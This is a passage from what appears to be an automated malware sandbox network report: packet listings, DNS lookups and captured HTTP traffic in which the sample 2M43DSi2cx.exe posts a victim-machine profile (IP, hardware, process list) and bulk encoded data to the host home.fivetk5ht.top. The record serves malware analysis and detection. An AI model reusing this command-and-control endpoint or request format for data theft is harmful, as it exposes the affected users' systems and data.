                                                              Dec 20, 2024 16:44:45.472914934 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473037958 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473052979 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473113060 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473474026 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473491907 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473505020 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473517895 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473828077 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.473942995 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473958969 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473985910 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.473994970 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.474014044 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.474033117 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.474040985 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.474051952 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.474087000 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592140913 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592184067 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592277050 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592360973 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592410088 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592637062 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592680931 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592690945 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.592906952 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592917919 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592938900 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592948914 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.592959881 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593265057 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593622923 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593635082 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593694925 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593749046 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593796968 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593815088 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593827963 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593838930 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593858957 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593893051 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593904018 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.593919039 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.593975067 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594055891 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594067097 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594099998 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594099998 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594142914 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594271898 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594281912 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594290018 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594301939 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594333887 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.594338894 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594392061 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594403028 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594412088 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594423056 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594501972 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594547987 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594558001 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594567060 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594652891 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594703913 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594713926 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594722986 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594815969 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594825983 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.594837904 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595093012 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595104933 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595115900 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595125914 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595138073 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595191956 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595201015 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595211029 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595220089 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595231056 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595242023 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595400095 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.595411062 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.656512976 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.657150030 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.657219887 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.657466888 CET4972480192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:45.712255001 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712270975 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712282896 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712295055 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712371111 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712382078 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712393045 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712403059 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.712412119 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713078022 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713088989 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713097095 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713109016 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713118076 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713128090 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713206053 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713216066 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713226080 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713236094 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713466883 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713476896 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713485956 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713498116 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713507891 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713562012 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713571072 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713579893 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713625908 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713644028 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713792086 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713802099 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713943958 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713953972 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.713963985 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714056015 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714065075 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714073896 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714356899 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714366913 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714375973 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714387894 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714396954 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714407921 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714562893 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714572906 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714581966 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714591980 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714601994 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714664936 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714678049 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714689016 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714884043 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714894056 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714903116 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714914083 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714925051 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.714935064 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715949059 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715960026 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715969086 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715979099 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.715989113 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.716000080 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.776716948 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:45.776982069 CET8049724185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:46.756012917 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:46.875782967 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:46.875864029 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:46.876199961 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:46.995826960 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:48.151928902 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:48.152411938 CET8049730185.121.15.192192.168.2.10
                                                              Dec 20, 2024 16:44:48.152483940 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:48.152704954 CET4973080192.168.2.10185.121.15.192
                                                              Dec 20, 2024 16:44:48.272209883 CET8049730185.121.15.192192.168.2.10

                                                              UDP Packets

                                                              TimestampSource PortDest PortSource IPDest IP
                                                              Dec 20, 2024 16:44:40.571445942 CET5590953192.168.2.101.1.1.1
                                                              Dec 20, 2024 16:44:40.571607113 CET5590953192.168.2.101.1.1.1
                                                              Dec 20, 2024 16:44:40.709120989 CET53559091.1.1.1192.168.2.10
                                                              Dec 20, 2024 16:44:40.709136963 CET53559091.1.1.1192.168.2.10
                                                              Dec 20, 2024 16:44:44.101731062 CET5591253192.168.2.101.1.1.1
                                                              Dec 20, 2024 16:44:44.101731062 CET5591253192.168.2.101.1.1.1
                                                              Dec 20, 2024 16:44:44.241940022 CET53559121.1.1.1192.168.2.10
                                                              Dec 20, 2024 16:44:44.241952896 CET53559121.1.1.1192.168.2.10
                                                              Dec 20, 2024 16:44:46.617084026 CET5591453192.168.2.101.1.1.1
                                                              Dec 20, 2024 16:44:46.617084026 CET5591453192.168.2.101.1.1.1
                                                              Dec 20, 2024 16:44:46.754834890 CET53559141.1.1.1192.168.2.10
                                                              Dec 20, 2024 16:44:46.754981041 CET53559141.1.1.1192.168.2.10

                                                              DNS Queries

                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                              Dec 20, 2024 16:44:40.571445942 CET192.168.2.101.1.1.10x5ca5Standard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:44:40.571607113 CET192.168.2.101.1.1.10x96c7Standard query (0)httpbin.org28IN (0x0001)false
                                                              Dec 20, 2024 16:44:44.101731062 CET192.168.2.101.1.1.10xc2c6Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:44:44.101731062 CET192.168.2.101.1.1.10x63aaStandard query (0)home.fivetk5ht.top28IN (0x0001)false
                                                              Dec 20, 2024 16:44:46.617084026 CET192.168.2.101.1.1.10xe752Standard query (0)home.fivetk5ht.topA (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:44:46.617084026 CET192.168.2.101.1.1.10xb2e1Standard query (0)home.fivetk5ht.top28IN (0x0001)false

                                                              DNS Answers

                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                              Dec 20, 2024 16:44:36.506347895 CET1.1.1.1192.168.2.100x4cNo error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                              Dec 20, 2024 16:44:36.506347895 CET1.1.1.1192.168.2.100x4cNo error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:44:40.709120989 CET1.1.1.1192.168.2.100x5ca5No error (0)httpbin.org34.226.108.155A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:44:40.709120989 CET1.1.1.1192.168.2.100x5ca5No error (0)httpbin.org98.85.100.80A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:44:44.241940022 CET1.1.1.1192.168.2.100xc2c6No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false
                                                              Dec 20, 2024 16:44:46.754834890 CET1.1.1.1192.168.2.100xe752No error (0)home.fivetk5ht.top185.121.15.192A (IP address)IN (0x0001)false

                                                              HTTP Request Dependency Graph

                                                              • httpbin.org
                                                              • home.fivetk5ht.top

                                                              HTTP Packets

                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                              0192.168.2.1049724185.121.15.192807688C:\Users\user\Desktop\2M43DSi2cx.exe
                                                              TimestampBytes transferredDirectionData
                                                              Dec 20, 2024 16:44:44.366157055 CET12360OUTPOST /zldPRFrmVFHTtKntGpOv1734579851 HTTP/1.1
                                                              Host: home.fivetk5ht.top
                                                              Accept: */*
                                                              Content-Type: application/json
                                                              Content-Length: 501222
                                                              Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 31 37 33 34 37 30 39 34 38 32 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 33 38 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 52 65 67 [TRUNCATED]
                                                              Data Ascii: { "ip": "8.46.123.189", "current_time": "1734709482", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 38, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 324 }, { "name": "csrss.exe", "pid": 408 }, { "name": "wininit.exe", "pid": 484 }, { "name": "csrss.exe", "pid": 492 }, { "name": "winlogon.exe", "pid": 552 }, { "name": "services.exe", "pid": 620 }, { "name": "lsass.exe", "pid": 628 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 776 }, { "name": "fontdrvhost.exe", "pid": 784 }, { "name": "svchost.exe", "pid": 872 }, { "name": "svchost.exe", "pid": 924 }, { "name": "dwm.exe", "pid": 984 }, { "name": "svchost.exe", "pid": 360 }, { "name": "svchost.exe", "pid": 356 }, { "name": "svchost.exe", "pid": 772 }, { "name": "svchost.exe", "pid": [TRUNCATED]
                                                              Dec 20, 2024 16:44:44.486063957 CET2472OUTData Raw: 36 6c 4f 31 6f 71 54 58 37 6c 34 43 65 43 57 62 65 50 66 47 47 59 38 48 35 52 6e 6d 58 35 44 69 4d 73 34 62 78 6e 45 74 58 47 5a 6c 51 78 4f 4a 6f 7a 77 2b 44 7a 50 4a 38 72 6c 68 71 64 50 43 2b 5c 2f 37 61 64 58 4f 4b 4e 53 4d 70 4f 4d 46 54 6f
                                                              Data Ascii: 6lO1oqTX7l4CeCWbePfGGY8H5RnmX5DiMs4bxnEtXGZlQxOJozw+DzPJ8rlhqdPC+\/7adXOKNSMpOMFTo1LvmcU\/wOor+xn\/h1d+wX\/wBEIH\/hzvjJ\/wDPDo\/4dXfsF\/8ARCB\/4c74yf8Azw6\/mj\/ifHhP\/ogeIv8Aw55b\/wDIev8AT0\/rn\/im1xt\/0crhb\/w0Zt\/8n6\/09P45qjk7fj\/Sv0v\/AGr\
                                                              Dec 20, 2024 16:44:44.486107111 CET2472OUTData Raw: 38 4f 66 38 41 50 48 36 5c 2f 79 44 6f 49 63 6e 33 5c 2f 41 4f 5c 2f 50 5c 2f 77 42 65 6f 5a 50 39 76 39 34 4f 63 43 72 4f 33 2b 50 38 65 6e 34 34 7a 54 50 4c 36 66 50 73 5c 2f 77 41 6e 73 4d 55 46 66 38 75 66 2b 33 53 70 49 33 6d 62 5c 2f 6e 44
                                                              Data Ascii: 8Of8APH6\/yDoIcn3\/AO\/P\/wBeoZP9v94OcCrO3+P8en44zTPL6fPs\/wAnsMUFf8uf+3SpI3mb\/nD\/AL3\/AJZA1Hudl2Z\/z9f8\/nT\/AO\/8nyZ6+b69\/wCf86Z\/cfZn975vfp\/h\/hQdcNvn+iIfL27\/AJH2+b\/y0H4fXrTPn+V\/9c5\/1v8An\/Papec7\/wB5\/nn7V\/X\/AOvTZIz8nz4cf5\/Oont8
                                                              Dec 20, 2024 16:44:44.486502886 CET2472OUTData Raw: 36 75 66 39 52 5c 2f 6e 33 7a 5c 2f 41 50 58 71 4a 76 76 4f 6a 76 38 41 39 74 50 77 6f 41 67 57 4d 5c 2f 77 45 37 78 47 54 35 6b 6e 5c 2f 41 4c 61 57 6e 39 50 79 78 7a 52 78 5c 2f 77 42 4d 5c 2f 77 44 70 72 5c 2f 7a 77 5c 2f 77 43 76 71 37 5c 2f
                                                              Data Ascii: 6uf9R\/n3z\/APXqJvvOjv8A9tPwoAgWM\/wE7xGT5kn\/ALaWn9PyxzRx\/wBM\/wDpr\/zw\/wCvq7\/Dp\/PFTRxyM2392zx+megqGP5pP7\/l9pPXn+nvWfs\/P8P+CaU+vy\/UZ88caRo8Y\/e3P7z\/AJ7fj6+v0xRn+NHkheX975n+ogGf59+Ke0nzMn344\/3X+q47\/wClZ9KfJG67Nifz+0fXt7f\/AFzWZofuQ\/
                                                              Dec 20, 2024 16:44:44.486782074 CET2472OUTData Raw: 34 6c 36 37 38 4e 72 37 77 7a 4e 34 73 6a 38 61 52 79 58 57 6a 65 48 50 43 50 69 5a 4e 55 74 4e 63 54 77 37 34 56 61 53 33 75 72 4c 78 66 5a 77 74 62 54 61 4e 42 4a 62 33 56 72 63 71 4a 4c 69 49 78 54 50 5c 2f 41 43 6d 5c 2f 38 46 50 5c 2f 41 41
                                                              Data Ascii: 4l678Nr7wzN4sj8aRyXWjeHPCPiZNUtNcTw74VaS3urLxfZwtbTaNBJb3VrcqJLiIxTP\/ACm\/8FP\/AAz8Gv2XPDvwR\/YL+G\/w88DS\/Ej4P+FtD8ZftFfHgeAtFs\/H\/j74keMdJfXLfw\/YeNrvSl8WzeBtLstfn1O10waxc6Q9rqHhnSGQ3Xg9nb7U\/wCCaHxq0n4E\/wDBMbxZ4u1n9qT\/AIZItdR\/bw13w5H8R
                                                              Dec 20, 2024 16:44:44.486810923 CET2472OUTData Raw: 45 5c 2f 58 38 50 36 6d 6a 32 66 6e 2b 48 5c 2f 41 41 54 6f 4b 33 6c 65 79 5c 2f 6c 5c 2f 39 61 6b 4b 37 65 4f 33 62 5c 2f 50 57 70 36 4e 75 37 6a 46 61 47 33 74 66 4f 58 39 66 4d 72 31 48 4a 32 5c 2f 47 70 57 58 48 42 35 42 71 4b 54 74 2b 4e 42
                                                              Data Ascii: E\/X8P6mj2fn+H\/AAToK3ley\/l\/9akK7eO3b\/PWp6Nu7jFaG3tfOX9fMr1HJ2\/GpWXHB5BqKTt+NBrDf5fqiOiiig1K9FFFBpT6\/Ij8v3\/T\/wCvUL\/dP4fzFWqr0GhFsPt\/n8KQqV5z3\/GpqQru9fwqOdef9fM09p5fj\/wCntH94f5\/GmVYqLYfb\/P4VZ2EEnb8f6VB3f6D+VWmXPB4IqFlxweQaAGP90\/h\
                                                              Dec 20, 2024 16:44:44.486836910 CET2472OUTData Raw: 66 76 38 41 35 78 2b 76 62 74 54 6d 2b 62 66 43 37 6c 50 73 5c 2f 77 43 36 78 5c 2f 6e 38 36 44 6f 47 66 36 36 4e 39 5c 2f 33 49 5c 2f 77 42 36 66 36 66 35 5c 2f 4f 71 79 79 2b 59 7a 5c 2f 4e 35 61 52 5c 2f 38 41 4c 54 7a 66 39 66 38 41 35 37 38
                                                              Data Ascii: fv8A5x+vbtTm+bfC7lPs\/wC6x\/n86DoGf66N9\/3I\/wB6f6f5\/Oqyy+Yz\/N5aR\/8ALTzf9f8A5788VNJ5kfyf8++JovL5nz\/nr3pkm\/c7\/wAeRFiOb\/U8+lADP3nmTfufk\/5ZcefB\/nt7+tC7JI3\/AIX\/ANH8r97+4m\/P\/l+P9O3aaST5cfcTzcf9N+3+i9uP84pkjf303\/8ALb93\/wAsf\/11PtfOX9f
                                                              Dec 20, 2024 16:44:44.486865044 CET2472OUTData Raw: 66 7a 2b 52 55 55 55 5c 2f 59 66 62 5c 2f 50 34 55 41 66 32 76 58 45 76 50 58 76 5c 2f 41 46 2b 76 58 39 65 75 4b 2b 55 4e 52 6c 7a 34 72 38 53 48 5c 2f 71 59 64 5a 5c 2f 48 64 71 4e 31 6a 38 6a 39 61 2b 68 39 49 38 53 61 4a 34 70 30 6e 53 5c 2f
                                                              Data Ascii: fz+RUUU\/Yfb\/P4UAf2vXEvPXv\/AF+vX9euK+UNRlz4r8SH\/qYdZ\/HdqN1j8j9a+h9I8SaJ4p0nS\/EXhzVtP13QdYtob\/S9W0u6hvtP1CzmG6O4tbqB3imjYZBKscOCrbWDAflnY\/ts\/s4NcTXeofE0m4uZ5Lm4kbwf4+dpJppWllkbZ4WbLOzMx9ya\/wCJSHhV4teI9XM8DwB4YeIvHWL4bxtKlxHhuDuCeJeJq\/
                                                              Dec 20, 2024 16:44:44.486890078 CET2472OUTData Raw: 76 45 33 37 4b 50 37 52 50 68 37 77 74 34 62 38 4e 61 5a 66 36 31 34 6a 38 51 65 49 39 61 2b 45 50 6a 44 54 64 45 30 50 51 4e 48 30 75 47 35 31 50 56 74 62 31 62 55 37 6d 31 73 4e 4b 30 33 54 72 65 34 76 72 2b 2b 75 49 4c 57 30 68 6c 75 4a 59 34
                                                              Data Ascii: vE37KP7RPh7wt4b8NaZf614j8QeI9a+EPjDTdE0PQNH0uG51PVtb1bU7m1sNK03Tre4vr++uILW0hluJY42\/wm+k5gMJmn0jfpDYDHUvb4TE8W8DwrUlUq0nJR8D\/COpG1WhOnVg4zhGSlTqRkmlZn\/UX9F\/ijPODfoh\/s\/eJ+GsasuzvKfA7xWr4DGSwuCxsaNSp9NX6XeGqc+DzHD4vA4mnUoVqtKpRxWGrUZwqSjKD
                                                              Dec 20, 2024 16:44:44.486938000 CET4944OUTData Raw: 54 61 5c 2f 79 62 2b 50 38 41 56 2b 64 2b 5a 5c 2f 44 74 78 36 56 50 4f 5c 2f 4c 2b 76 6d 64 68 54 2b 52 74 6e 38 59 5c 2f 6e 5c 2f 58 5c 2f 41 43 65 76 64 5a 50 37 32 2b 50 39 35 4b 50 4e 6b 5c 2f 7a 69 6e 5a 78 76 58 5c 2f 6e 6c 5c 2f 77 44 57
                                                              Data Ascii: Ta\/yb+P8AV+d+Z\/Dtx6VPO\/L+vmdhT+Rtn8Y\/n\/X\/ACevdZP72+P95KPNk\/zinZxvX\/nl\/wDWpmP3bvu3v5v6fy\/x+tamvOvP+vmMPK70mjT\/AJY+X\/h\/X+lMbf5n994\/+ef+fx71NjG\/D\/8Abv5WfJ\/l7\/5NMk8tdn+s8zvHHx0\/z\/8AXoLK3coU3pj\/AFn+f89+hNQtH8\/k7POeT\/tv78f5+tX
                                                              Dec 20, 2024 16:44:44.605995893 CET7416OUTData Raw: 39 49 75 76 48 5c 2f 69 33 58 4e 4b 38 50 61 52 70 69 33 74 76 6f 57 6b 79 36 33 34 7a 75 4c 62 77 76 50 39 54 51 38 63 5c 2f 43 7a 45 30 73 4c 57 6f 63 63 5a 52 55 6a 6a 59 53 71 59 4f 4b 65 4c 56 62 45 30 6f 66 32 58 65 74 52 77 38 73 49 71 38
